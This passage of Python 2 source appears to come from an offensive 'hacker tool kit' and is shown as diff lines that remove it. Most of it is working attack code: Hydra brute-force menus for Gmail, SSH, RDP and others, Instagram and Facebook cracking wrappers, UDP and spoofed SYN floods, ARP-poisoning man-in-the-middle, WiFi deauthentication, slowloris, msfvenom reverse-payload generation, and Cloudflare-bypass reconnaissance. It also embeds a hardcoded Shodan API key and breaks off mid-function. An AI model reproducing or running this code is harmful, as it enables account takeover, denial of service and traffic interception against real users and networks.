main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - os.system("python " + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliarys'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and 